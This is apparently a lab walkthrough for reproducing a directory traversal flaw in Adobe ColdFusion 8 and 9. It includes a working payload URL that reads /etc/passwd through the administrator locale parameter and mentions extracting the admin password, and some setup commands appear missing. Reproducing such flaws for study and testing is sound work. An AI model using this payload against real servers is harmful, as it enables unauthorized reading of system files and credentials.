Adobe ColdFusion is a dynamic Web server product of Adobe Corporation of the United States. Its running CFML (ColdFusion Markup Language) is a programming language for Web applications.
A directory traversal vulnerability exists in Adobe ColdFusion 8 and 9, which could allow unauthorized users to read arbitrary files on the server.
Run the following command to start the Adobe CouldFusion 8.0.1 server:
It may take 1 to 5 minutes for the environment to start. After starting
http://your-ip:8500/CFIDE/administrator/enter.cfm, you can visit the initialization page, enter the password
admin, and start to initialize the entire environment.
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en, you can read the file
Read the background administrator password
- Docker: How to build a rabbitmq image cluster
- Opentelemetry + Jaeger Python Version Cross Service Call Example
- MultipartFile Upload an Image Example
- Electron: How to Use BrowserWindow to Create a Window
- Windows Core Audio APIs: How to Progress Loopback Recording and Generate WAV File
- Websocket Front-end Call Example
- Android: How to Add Background Music for Activity with Service
- C#: How to Get details of the directory where the currently running program is located
- File class details (get the file name, size, path, create, etc.)
- Hutool Excel Import & Export Example
- Base64 Image Compression Example
- How to Use Printf in HAL Library
- Open CASCADE Technology 7.7.0 released
- Flutter & Dart Regular Expression Examples
- WCNSS_qcom_cfg.ini WIFI Configuration File Guide